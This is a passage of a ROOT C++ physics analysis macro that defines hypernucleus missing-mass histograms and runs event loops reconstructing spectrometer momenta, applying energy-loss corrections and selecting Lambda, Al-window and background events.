TH1F *h1_02 = new TH1F("h1_02","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",100,-100.25,150.1);
TH1F *h1_02b = new TH1F("h1_02b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",100,-100.25,150.1);
TH1F *h1_03 = new TH1F("h1_03","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102.,153.);
TH1F *h1_03b = new TH1F("h1_03b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102.5,153.);
TH1F *h1_04 = new TH1F("h1_04","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-105,150);
TH1F *h1_05 = new TH1F("h1_05","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-100,155);
TH1F *h1_05b = new TH1F("h1_05b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-100,155);
TH1F *h150_1 = new TH1F("h150_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-100,160);
TH1F *h150_1b = new TH1F("h150_1b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-100,160);
TH1F *h150_2 = new TH1F("h150_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",126,-101,151);
TH1F *h150_2b = new TH1F("h150_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",126,-101,151);
TH1F *h150_3 = new TH1F("h150_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102,152);
TH1F *h150_4 = new TH1F("h150_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-105,155);
TH1F *h150_5 = new TH1F("h150_5","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h150_6 = new TH1F("h150_6","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",132,-104,160);
TH1F *h125_1 = new TH1F("h125_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-100,152);
TH1F *h125_2 = new TH1F("h125_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-104,148);
TH1F *h125_3 = new TH1F("h125_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-102,150);
TH1F *h125_3b = new TH1F("h125_3b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-102,150);
TH1F *h125_4 = new TH1F("h125_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-105,147);
TH1F *h125_4b = new TH1F("h125_4b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-105,147);
TH1F *h125_5 = new TH1F("h125_5","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",116,-103,158);
TH1F *h125_5b = new TH1F("h125_5b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",116,-103,158);
TH1F *h125_6 = new TH1F("h125_6","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
TH1F *h125_6b = new TH1F("h125_6b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
/////////////////////++++++++++ Dec01, 2020&&&&&&&&&&&&&&&&&&##################@@@@@@@@@@@@@@@@@!!!!!!!!!
TH1F *h_75_1 = new TH1F("h_75_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-100,166);
TH1F *h_75_3 = new TH1F("h_75_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-103,163);
TH1F *h_75_1b = new TH1F("h_75_1b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-100,166);
TH1F *h_75_3b = new TH1F("h_75_3b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-103,163);
// H contamination
TH1F *h_h = new TH1F("h_h"," ;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",134,-101,100); // H in T/T data or to see H contamination
TH1F *h_hbg = new TH1F("h_hbg"," ;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",134,-101,100);// bg in H contamination
TH1F *h_hc0 = new TH1F("h_hc0"," H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",120,-90,90);
TH1F *h_hc0b = new TH1F("h_hc0b","H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",120,-90,90);
TH1F *h_hc1 = new TH1F("h_hc1"," H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",128,-96,96);
TH1F *h_hc1b = new TH1F("h_hc1b","H contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",128,-96,96);
TH1F *H_T = new TH1F("H_T","H in T/T data ;-B_{#Lambda}(MeV);Counts/ 1.52MeV ",150,-100,128);
TH1F *H_TB = new TH1F("H_TB","H in T/T data ;-B_{#Lambda}(MeV);Counts/ 1.52MeV ",150,-100,128);
TH1F *h53_t = new TH1F("h53_t","nnL Spectrum, T/T data(-100.5, 151.5) ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",168,-100.5,151.5);
TH1F *h53_tb = new TH1F("h53_tb","nnL Spectrum, T/T data(-100.5, 151.5) ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",168,-100.5,151.5);
gStyle->SetOptStat(111111);
TH1F *h_1 = new TH1F("h_1"," ",120,1000, 1300);
h->GetXaxis()->SetTitle("Missing Mass (MeV/c^{2})"); // HH data for lambda and sigma
h->GetXaxis()->SetTitleSize(0.07);
h->GetXaxis()->SetTitleFont(62);// 32 gives the times italic bold
h->GetXaxis()->SetTitleOffset(1.05);
h->GetXaxis()->CenterTitle();
h->GetXaxis()->SetLabelSize(0.06);
h->GetYaxis()->SetTitle("Counts / 0.75 MeV");
h->GetYaxis()->CenterTitle();
h->GetYaxis()->SetTitleSize(0.07);
h->GetYaxis()->SetTitleFont(62);// 32 gives the times italic bold
h->GetYaxis()->SetTitleOffset(0.80);
h->GetYaxis()->SetLabelSize(0.06);
h_h->GetXaxis()->SetTitle("-B_{#Lambda} (MeV)"); // Tritium target for H kinematics to see the H contamination
h_h->GetXaxis()->SetTitleSize(0.07);
h_h->GetXaxis()->SetTitleFont(62);// 32 gives the times italic bold
h_h->GetXaxis()->SetTitleOffset(0.85);
h_h->GetXaxis()->CenterTitle();
h_h->GetXaxis()->SetLabelSize(0.06);
h_h->GetYaxis()->SetTitle("Counts / 1.5 MeV");
h_h->GetYaxis()->CenterTitle();
h_h->GetYaxis()->SetTitleSize(0.07);
h_h->GetYaxis()->SetTitleFont(62);// 32 gives the times italic bold
h_h->GetYaxis()->SetTitleOffset(0.70);
h_h->GetYaxis()->SetLabelSize(0.06);
TH1F *h6 = new TH1F("h6",";RHRS reconstructed Momentum;Counts/ 14.4 mev",250,1.7,2.0);
char tempc[500];
// ======================================================
// ---------------------------------------------------------------------------
// Reset of the per-dataset "tune event" buffers before the event loops.
// -2222.0 / -1 act as "unfilled" sentinels. The *_2 arrays belong to the t2
// (H-in-T-kinematics) data set, the *_4 arrays to the Al-window events
// selected from the same t2 tree (see the t2 loop below).
// ---------------------------------------------------------------------------
bool rtrig = false;   // RHRS trigger flag for the t1 loop
for(int i=0; i<nmax; i++){
  x[i] = -2222.0;
  y[i] = -2222.0;
  xp[i] = -2222.0;
  yp[i] = -2222.0;
  z_av[i] = -2222.0;
  z_av_1[i] = -2222.0;
  phir[i] = -2222.0;
  phil[i] = -2222.0;
  z_recon[i] = -2222.0; /// Jan 04, 2019
  foil_flag[i] = -1;
}
// ((((((((((((((((((((((((((((((((((((((((((((
bool rtrig_2 = false;  // RHRS trigger flag for the t2 loop
for(int i=0; i<nmax_2; i++){
  x_2[i] = -2222.0;
  y_2[i] = -2222.0;
  xp_2[i] = -2222.0;
  yp_2[i] = -2222.0;
  z_av_2[i] = -2222.0;
  z_av_1_2[i] = -2222.0;
  phir_2[i] = -2222.0;
  phil_2[i] = -2222.0;
  z_recon_2[i] = -2222.0; ///Jan 04, 2019
  foil_flag_2[i] = -1;
  // Al-window (entrance/exit cap) tune buffers share nmax_2 sizing here;
  // NOTE(review): they are bounds-checked against nmax_4 when filled — confirm
  // nmax_4 <= nmax_2 so this reset covers every slot that can be written.
  x_4[i] = -2222.0;
  y_4[i] = -2222.0;
  xp_4[i] = -2222.0;
  yp_4[i] = -2222.0;
  phir_4[i] = -2222.0;
  phil_4[i] = -2222.0;
  z_recon_4[i] = -2222.0; ///Jan 04, 2019
  foil_flag_4[i] = -1;
}
// +++++++++++++++++++++++++ for t1 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// ---------------------------------------------------------------------------
// t1 event loop (H/H kinematics data): reconstruct target angles/momenta on
// both spectrometer arms from focal-plane variables, apply target
// energy-loss ("struggling") corrections, compute the missing mass, fill the
// Lambda/Sigma spectrum, and collect events inside the Lambda/Sigma windows
// into the momentum-matrix tuning buffers.
//
// Fix (review): the event-selection cut used bitwise '&' between two boolean
// comparisons — harmless on bool operands but non-short-circuiting and
// fragile; changed to logical '&&'.
// ---------------------------------------------------------------------------
for (int i=0; i< ent; i++){
  // Reset per-event scratch arrays to the "unfilled" sentinel before GetEntry.
  for(int j=0; j<max; j++){
    l_x_fp[j] = -2222.0;
    l_th_fp[j] = -2222.0;
    l_y_fp[j] = -2222.0;
    l_ph_fp[j] = -2222.0;
    th1[j] = -2222.0;
    th2[j] = -2222.0;
    ph1[j] =-2222.0;
    ph2[j] =-2222.0;
    delta_pep[j]= -2222.0;
    pep_real[j] =-2222.0;
    delta_pk[j]= -2222.0;
    pk_real[j] = -2222.0;
    r_x_fp[j] = -2222.0;
    r_th_fp[j] = -2222.0;
    r_y_fp[j] = -2222.0;
    r_ph_fp[j] = -2222.0;
    trig5[j] = 0.0;
    rtrig = false;
  }
  trig5[0] = 0.0;
  rtrig = false;
  t1->GetEntry(i);
  // trig5 > 1 marks an RHRS trigger for this event.
  if(trig5[0]>1.0) rtrig = true; //JUly 01, 2019
  else rtrig = false;
  // Average reconstructed vertex z of the two arms.
  z_av[0] = (lvz[0] + rvz[0])/2.0;
  z_av_1[0] = z_av[0];
  XFP = l_x_fp[0];
  XpFP = l_th_fp[0];
  YFP = l_y_fp[0];
  YpFP = l_ph_fp[0];
  R_XFP = r_x_fp[0];
  R_XpFP = r_th_fp[0];
  R_YFP = r_y_fp[0];
  R_YpFP = r_ph_fp[0];
  // Selection: RHRS trigger, coincidence time within +/-1 ns, arm-vertex
  // agreement within 40 mm, and vertex inside +/-10 cm of target center.
  // (was: '... <0.040 & fabs(...)' — bitwise AND; now logical AND)
  if(rtrig==true && fabs(ctime)<1.0 && fabs(lvz[0]-rvz[0])<0.040 && fabs(z_av_1[0])<0.10){ // to plot lambda and sigma
    // Normalize focal-plane variables into the matrix parameterization range.
    XFP = (XFP-XFPm)/XFPr;
    XpFP = (XpFP-XpFPm)/XpFPr;
    YFP = (YFP-YFPm)/YFPr;
    YpFP = (YpFP-YpFPm)/YpFPr;
    R_XFP = (R_XFP-XFPm)/XFPr;
    R_XpFP = (R_XpFP-XpFPm)/XpFPr;
    R_YFP = (R_YFP-YFPm)/YFPr;
    R_YpFP = (R_YpFP-YpFPm)/YpFPr;
    z_av[0] =(z_av[0]- Ztm)/Ztr;
    // LHRS target-angle and momentum reconstruction from the tuned matrices.
    th2[0] = calcf2t_th(Theta_L, XFP, XpFP, YFP, YpFP, z_av_1[0]);
    th2[0] = th2[0]*Xptr + Xptm;
    ph2[0] = calcf2t_ph(PHI_L, XFP, XpFP, YFP, YpFP, z_av_1[0] );
    ph2[0] = ph2[0]*Yptr + Yptm;
    momL[0] = calcf2t_mom(mom_L, XFP, XpFP, YFP, YpFP, z_av[0]);
    momL[0] = momL[0]*Momr + Momm;
    par_ep[1] = -th2[0]; // right handed system
    par_ep[2] = -ph2[0]; // right handed system
    double holiang;
    // Target struggling LHRS step #7: energy-loss correction, z-dependent
    // (upstream vs downstream of z = 8 cm).
    if(z_av_1[0]<8.0e-2){
      holiang = par_ep[2] + hrs_ang;
      holiang=-holiang;
      delta_pep[0] = -1.35758 * sin(-4.59571 * holiang) + 2.09093;
    }
    else{
      holiang = par_ep[2] + hrs_ang;
      holiang=-holiang;
      delta_pep[0] = 6.23409e-3 * holiang + 4.03363e-1;
    }
    pep_real[0] = momL[0] + delta_pep[0]/1000.0; //LHRS momentum at the reaction point in GeV
    par_ep[0] = pep_real[0];
    // RHRS angle and momentum calculation
    th1[0] = calcf2t_th(Theta_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
    th1[0] = th1[0]*Xptr + Xptm;
    ph1[0] = calcf2t_ph(PHI_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
    ph1[0] = ph1[0]*Yptr + Yptm;
    momR[0] = calcf2t_mom(mom_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
    momR[0] = momR[0]*Momr+Momm;
    par_k[1] = -th1[0]; /// DEc4 2019 2 lines
    par_k[2] = -ph1[0];
    double holiang1;
    // target struggling step #11: kaon-side energy-loss correction.
    if(z_av_1[0]<8.0e-2){
      holiang1= par_k[2] - hrs_ang;
      delta_pk[0] =-1.31749 * sin(-4.61513* holiang1) + 2.03687;
    }
    else{
      holiang1= par_k[2] - hrs_ang;
      delta_pk[0] = 3.158e-2 * holiang1 + 4.05819e-1;
    }
    pk_real[0] = momR[0] + delta_pk[0]/1000.0; // kaon momentum at the reaction point
    par_k[0] = pk_real[0];
    // missing mass calculation==============================
    hallap = hallap - 0.1843 ;// beam energy-loss correction; must be -ve
    hallap = hallap/1000.0; // MeV-->GeV
    mm = CalcMM(hallap, par_ep, par_k, mp);
    mm = (mm)*1000.; // GeV--->MeV  (fixed: comment had the conversion reversed)
    h->Fill(mm);
    // De-normalize focal-plane variables back to physical units before
    // storing in the tune buffers / output tree.
    XFP = XFP * XFPr + XFPm;
    XpFP = XpFP * XpFPr + XpFPm;
    YFP = YFP * YFPr + YFPm;
    YpFP = YpFP * YpFPr + YpFPm;
    R_XFP = R_XFP*XFPr +XFPm ;
    R_XpFP = R_XpFP*XpFPr+XpFPm;
    R_YFP = R_YFP*YFPr+ YFPm;
    R_YpFP = R_YpFP*YpFPr +YpFPm;
    z_av[0] =z_av[0]*Ztr + Ztm;
    tnew->Fill();
    // Select events inside any Lambda/Sigma missing-mass window and store
    // them for the momentum-matrix tuning.
    bool lambdaflag=false;
    int peak_with_hit= -1;
    for(int j=0; j<npeak; j++){
      if(Lambda_cent[j]-Lambda_width[j]<mm
         &&mm < Lambda_cent[j]+Lambda_width[j]){
        lambdaflag=true;
        peak_with_hit=j;
        h_1 ->Fill(mm);
        h_1 ->SetLineColor(j+2);
      }
      else lambdaflag=false;
      if(ntune_event<nmax && lambdaflag==true){
        foil_flag[ntune_event] = peak_with_hit;
        p10[ntune_event] = par_ep[0];
        p11[ntune_event] = par_ep[1];
        p12[ntune_event] = par_ep[2];
        p13[ntune_event] = par_k[0];
        p14[ntune_event] = par_k[1];
        p15[ntune_event] = par_k[2];
        p16[ntune_event] = hallap;
        x[ntune_event] = R_XFP; ////RHRS open these lines only when RHRS mom matrix is tuning
        y[ntune_event] = R_YFP;
        xp[ntune_event] = R_XpFP;
        yp[ntune_event] = R_YpFP;
        // x[ntune_event] = XFP; ////LHRS open these line only when LHRS mom matrix is tuning
        // y[ntune_event] = YFP;
        // xp[ntune_event] = XpFP;
        // yp[ntune_event] = YpFP;
        z_recon[ntune_event] = z_av_1[0];
        phir[ntune_event] =ph1[0];
        phil[ntune_event] =ph2[0];
        ntune_event++;
      }
    }//int j
  }
}
tnew->Write();
// ((((((((((((((((((((((((((((((((((((((((( t2 ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
// ---------------------------------------------------------------------------
// t2 event loop: H data taken in the tritium (T) kinematics, plus the Al
// target-cell window events from the same tree. Two parallel reconstruction
// paths are computed per event:
//   *_ht_* variables: H-in-T-kinematics path (Lambda peak, used for tuning),
//   plain *_2 path:   Al-window path (27Al missing mass, mm_ht spectrum).
// The exact statement order matters: hallap_2 is corrected in place before
// the Al missing-mass computation, so the code below is left byte-identical
// and only annotated.
// ---------------------------------------------------------------------------
for (int i=0 ; i< ent_2 ; i++){
  // Reset per-event scratch arrays to the "unfilled" sentinel.
  for(int j=0 ; j<max ; j++){
    l_x_fp_2[j] = -2222.0;
    l_th_fp_2[j] = -2222.0;
    l_y_fp_2[j] = -2222.0;
    l_ph_fp_2[j] = -2222.0;
    th1_2[j] = -2222.0;
    th2_2[j] = -2222.0;
    ph1_2[j] =-2222.0;
    ph2_2[j] =-2222.0;
    delta_pep_2[j]= -2222.0;
    pep_real_2[j] =-2222.0;
    delta_pk_2[j]= -2222.0;
    pk_real_2[j] = -2222.0;
    delta_ht_pep_2[j]= -2222.0; //May 01, 2021
    pep_ht_real_2[j] =-2222.0;
    delta_ht_pk_2[j]= -2222.0;
    pk_ht_real_2[j] = -2222.0;
    r_x_fp_2[j] = -2222.0;
    r_th_fp_2[j] = -2222.0;
    r_y_fp_2[j] = -2222.0;
    r_ph_fp_2[j] = -2222.0;
    trig5_2[j] = 0.0;
    rtrig_2 = false;
  }
  trig5_2[0] = 0.0;
  rtrig_2 = false;
  t2->GetEntry(i);
  // trig5 > 1 marks an RHRS trigger for this event.
  if(trig5_2[0]>1.0) rtrig_2 = true; //JUly 01, 2019
  else rtrig_2 = false;
  // Average vertex z, duplicated for the two reconstruction paths.
  z_av_2[0] = (lvz_2[0] + rvz_2[0])/2.0;
  z_av_1_2[0] = z_av_2[0];
  z_av_ht_2[0] = z_av_2[0];
  XFP_2 = l_x_fp_2[0];
  XpFP_2 = l_th_fp_2[0];
  YFP_2 = l_y_fp_2[0];
  YpFP_2 = l_ph_fp_2[0];
  R_XFP_2 = r_x_fp_2[0];
  R_XpFP_2 = r_th_fp_2[0];
  R_YFP_2 = r_y_fp_2[0];
  R_YpFP_2 = r_ph_fp_2[0];
  // Normalize focal-plane variables into the matrix parameterization range.
  XFP_2 = (XFP_2-XFPm)/XFPr;
  XpFP_2 = (XpFP_2-XpFPm)/XpFPr;
  YFP_2 = (YFP_2-YFPm)/YFPr;
  YpFP_2 = (YpFP_2-YpFPm)/YpFPr;
  R_XFP_2 = (R_XFP_2-XFPm)/XFPr;
  R_XpFP_2 = (R_XpFP_2-XpFPm)/XpFPr;
  R_YFP_2 = (R_YFP_2-YFPm)/YFPr;
  R_YpFP_2 = (R_YpFP_2-YpFPm)/YpFPr;
  /// ================= for Al event in tune ==== jan 07, 2020
  // Keep a normalized copy for the Al-window tune buffers (*_4).
  XFP_4 = XFP_2;
  XpFP_4 = XpFP_2;
  YFP_4 = YFP_2;
  YpFP_4 = YpFP_2;
  R_XFP_4 =R_XFP_2;
  R_XpFP_4 = R_XpFP_2;
  R_YFP_4 =R_YFP_2;
  R_YpFP_4 =R_YpFP_2;
  z_av_2[0] =(z_av_2[0]- Ztm)/Ztr;
  // LHRS target-angle and momentum reconstruction.
  th2_2[0] = calcf2t_th(Theta_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_1_2[0]);
  th2_2[0] = th2_2[0]*Xptr + Xptm;
  ph2_2[0] = calcf2t_ph(PHI_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_1_2[0] );
  ph2_2[0] = ph2_2[0]*Yptr + Yptm;
  momL_2[0] = calcf2t_mom(mom_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_2[0]);
  momL_2[0] =momL_2[0]*Momr + Momm;
  // Central-momentum rescaling for the T kinematics setting.
  momL_2[0] = momL_2[0]*2.217925/2.10; // Original for H/T and tritium only
  par_ep_2[1] = -th2_2[0]; // Dec4, 2019
  par_ep_2[2] = -ph2_2[0];
  ///// From here is the energy struggling for the H data in the T kinematics======LHRS===**************************
  par_ht_ep_2[1] = -th2_2[0]; //May 01, 2021
  par_ht_ep_2[2] = -ph2_2[0];
  double holiang2_ht;
  // Target struggling LHRS step #7
  if( z_av_ht_2[0]<8.0e-2){
    holiang2_ht = par_ht_ep_2[2] + hrs_ang;
    holiang2_ht = - holiang2_ht;
    delta_ht_pep_2[0] = -1.35758*sin(-4.59571* holiang2_ht) + 2.09093;
  }
  else{
    holiang2_ht = par_ht_ep_2[2] + hrs_ang;
    holiang2_ht = - holiang2_ht;
    delta_ht_pep_2[0] = 6.23409e-3* holiang2_ht + 4.03363e-1;
  }
  pep_ht_real_2[0] = momL_2[0] + delta_ht_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
  par_ht_ep_2[0] = pep_ht_real_2[0] ;
  ///// Upto here is the energy struggling for the H data in the T kinematics======LHRS==**************************
  ///// From here is the energy struggling for the Al data in the H/T kinematics==========******* LHRS ***************
  double holiang2;
  // Target struggling LHRS step #7
  if( z_av_1_2[0]<8.0e-2){
    holiang2 = par_ep_2[2] + hrs_ang;
    holiang2 = - holiang2;
    delta_pep_2[0] = -1.35758*sin(-4.59571* holiang2) + 2.09093;
    delta_pep_2[0] = delta_pep_2[0] + 0.063; //May 07 2021***************************
  }
  else{
    holiang2 = par_ep_2[2] + hrs_ang;
    holiang2 = - holiang2;
    // delta_pep_2[0] = 6.23409e-3* holiang2 + 4.03363e-1;
    delta_pep_2[0] = 0.3004; //May 07 2021************************************
  }
  pep_real_2[0] = momL_2[0] + delta_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
  par_ep_2[0] = pep_real_2[0] ;
  ///// upto here is the energy struggling for the Al data in the T kinematics=====LHRS =====**************************
  // RHRS angle and momentum calculation
  th1_2[0] = calcf2t_th(Theta_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
  th1_2[0] = th1_2[0]*Xptr + Xptm;
  ph1_2[0] = calcf2t_ph(PHI_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
  ph1_2[0] = ph1_2[0]*Yptr + Yptm;
  momR_2[0] = calcf2t_mom(mom_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
  momR_2[0] = momR_2[0]*Momr+Momm;
  par_k_2[1] = -th1_2[0]; // Dec2, 2019
  par_k_2[2] = -ph1_2[0];
  ///// From here is the energy struggling for the H data in the T kinematics for RHRS=====**************************
  par_ht_k_2[1] = -th1_2[0]; // May 01, 2021
  par_ht_k_2[2] = -ph1_2[0];
  double holiang3_ht;
  // target struggling step #11
  if(z_av_ht_2[0]<8.0e-2){
    holiang3_ht = par_ht_k_2[2] - hrs_ang;
    holiang3_ht = holiang3_ht;   // no-op self-assignment (kept for symmetry with the LHRS sign flip)
    delta_ht_pk_2[0] =-1.31749*sin(-4.61513*holiang3_ht) + 2.03687;
  }
  else{
    holiang3_ht = par_ht_k_2[2] - hrs_ang;
    holiang3_ht = holiang3_ht;   // no-op self-assignment
    delta_ht_pk_2[0] = 3.158e-2*holiang3_ht + 4.05819e-1;
  }
  pk_ht_real_2[0] = momR_2[0] + delta_ht_pk_2[0]/1000.0; // kaon momentum at the reaction point
  par_ht_k_2[0] = pk_ht_real_2[0];
  hallap_ht_2 = hallap_2-0.1843 ;// must be -ve for the H data in the tritium kinematics
  hallap_ht_2 = hallap_ht_2/1000.0; // MeV-->GeV
  // missing mass calculation==============================
  mm_2 = CalcMM(hallap_ht_2, par_ht_ep_2, par_ht_k_2, mp);
  mm_2 = (mm_2)*1000.; // GeV --> MeV (factor 1000 applied to CalcMM output)
  mmT_T = CalcMM(hallap_ht_2, par_ht_ep_2, par_ht_k_2, m_T);// to analyze H/T and considering H mass as tritium mass
  mmT_T = (mmT_T)*1000.; // GeV --> MeV // m_T is the tritium target
  mmT_T = mmT_T - 2994.814;   // subtract M(3H)+M(Lambda)-type offset to get -B_Lambda scale
  ///// Upto here is the energy struggling for the H data in the T kinematics for RHRS=====**************************
  ///// From here is the energy struggling for the Al data in the H/T kinematics for RHRS=====**************************
  double holiang3;
  // target struggling step #11
  if(z_av_1_2[0]<8.0e-2){
    holiang3 = par_k_2[2] - hrs_ang;
    holiang3 = holiang3;   // no-op self-assignment
    delta_pk_2[0] =-1.31749*sin(-4.61513*holiang3) + 2.03687;
    delta_pk_2[0] =delta_pk_2[0] + 0.0627;//May 07 2021************************************
  }
  else{
    holiang3 = par_k_2[2] - hrs_ang;
    holiang3 = holiang3;   // no-op self-assignment
    // delta_pk_2[0] = 3.158e-2*holiang3 + 4.05819e-1;
    delta_pk_2[0] = 0.2962;//May 07 2021************************************
  }
  pk_real_2[0] = momR_2[0] + delta_pk_2[0]/1000.0; // kaon momentum at the reaction point
  par_k_2[0] = pk_real_2[0];
  // missing mass calculation==============================
  // NOTE: hallap_2 is corrected IN PLACE here (after hallap_ht_2 was derived
  // from it above) — the ordering of these statements is load-bearing.
  if(z_av_1_2[0]<8.0e-2){ //May 07 2021************************************
    hallap_2 = hallap_2 - 0.1175;
  }
  else{
    hallap_2 = hallap_2 - 0.2257;//May 07 2021************************************
  }
  hallap_2 = hallap_2/1000.0; // MeV-->GeV
  mm_4 = CalcMM(hallap_2, par_ep_2, par_k_2, m_Al);
  mm_4 = (mm_4)*1000.0;
  mm_ht = mm_4 - 25.3123*1000;   // shift by ~25.3 GeV offset -> Al missing-mass scale
  //// MAy 17, 2021.... Now adjusting the Al entrance and Exit window.
  // H-in-T selection: RHRS trigger, |ctime| < 1 ns, arm-vertex agreement.
  bool HTflag = false;
  if(rtrig_2==true && fabs(ctime_2)<1.0 && fabs(lvz_2[0]-rvz_2[0])<0.04){ // Oct 28 2020 closed the ct 0.04 is original
    HTflag = true;
  }
  else HTflag = false;
  if(HTflag == true && fabs(z_av_1_2[0])<0.10){
    h_2->Fill(mm_2);
    // De-normalize focal-plane variables before storing.
    XFP_2 = XFP_2 * XFPr + XFPm;
    XpFP_2 = XpFP_2 * XpFPr + XpFPm;
    YFP_2 = YFP_2 * YFPr + YFPm;
    YpFP_2 = YpFP_2 * YpFPr + YpFPm;
    R_XFP_2 = R_XFP_2*XFPr +XFPm ;
    R_XpFP_2 = R_XpFP_2*XpFPr+XpFPm;
    R_YFP_2 = R_YFP_2*YFPr+ YFPm;
    R_YpFP_2 = R_YpFP_2*YpFPr +YpFPm;
    z_av_2[0] =z_av_2[0]*Ztr + Ztm;
    tnew->Fill();
    // Collect events inside the Lambda windows into the *_2 tune buffers.
    bool lambdaflag_2=false;
    int peak_with_hit_2= -1;
    for(int j=0; j<npeak_2; j++){
      if(Lambda_cent_2[j]-Lambda_width_2[j]<mm_2
         &&mm_2 < Lambda_cent_2[j]+Lambda_width_2[j]){
        lambdaflag_2=true;
        peak_with_hit_2=j;
      }
      else lambdaflag_2=false;
      if(ntune_event_2<nmax_2 && lambdaflag_2==true){
        foil_flag_2[ntune_event_2] = peak_with_hit_2;
        p10_2[ntune_event_2] = par_ht_ep_2[0]; /// for H data in T kinematics
        p11_2[ntune_event_2] = par_ht_ep_2[1]; // ht added on may 05, 2021
        p12_2[ntune_event_2] = par_ht_ep_2[2];
        p13_2[ntune_event_2] = par_ht_k_2[0];
        p14_2[ntune_event_2] = par_ht_k_2[1];
        p15_2[ntune_event_2] = par_ht_k_2[2];
        p16_2[ntune_event_2] = hallap_ht_2; // may 05
        x_2[ntune_event_2] = R_XFP_2; ////RHRS open these line only when RHRS mom matrix is tuning
        y_2[ntune_event_2] = R_YFP_2;
        xp_2[ntune_event_2] = R_XpFP_2;
        yp_2[ntune_event_2] = R_YpFP_2;
        // x_2[ntune_event_2] = XFP_2; ////LHRS open these line only when LHRS mom matrix is tuning
        // y_2[ntune_event_2] = YFP_2;
        // xp_2[ntune_event_2] = XpFP_2;
        // yp_2[ntune_event_2] = YpFP_2;
        z_recon_2[ntune_event_2] = z_av_1_2[0];
        phir_2[ntune_event_2] =ph1_2[0];
        phil_2[ntune_event_2] =ph2_2[0];
        ntune_event_2++;
      }
    }//int j
  }
  /// ==================== to include the Al/HT evenys for tune========== jan 07 2020
  // Coincidence-time cut for the Al-window "real" spectrum.
  bool htflag1 = false;
  if(rtrig_2==true && fabs(ctime_2)<1.0 && fabs(lvz_2[0]-rvz_2[0])<0.040){
    htflag1 = true;
  }
  else htflag1 = false;
  // Al entrance/exit cap selection: aerogel PID cuts plus vertex z inside
  // either window band (|z| in [0.11, 0.14] m).
  bool HTallflag = false;
  if(a1_2<120.0 && a2_2>1650.0 && a2_2<6800.0 && //for entrance and exit aluminum caps
     ((z_av_1_2[0] > -0.14 && z_av_1_2[0]< -0.11) || (z_av_1_2[0] > 0.11 && z_av_1_2[0]< 0.14))){
    HTallflag = true;
  }
  else HTallflag = false;
  ///// AL background analysis
  // Accidental-background sample: sidebands of the coincidence-time spectrum.
  bool hbgflag = false;
  if(rtrig_2==true &&((ctime_2>-49.39 && ctime_2 < -9.06)||(ctime_2>13.18 && ctime_2 < 48.6))&& fabs(lvz_2[0]-rvz_2[0])<0.040){
    hbgflag = true;
  }
  else hbgflag = false;
  if(HTallflag == true && hbgflag == true)
    {
      hb-> Fill(mm_ht);
      hbal_15_1-> Fill(mm_ht); // c/0.15
      hb5-> Fill(mm_ht);
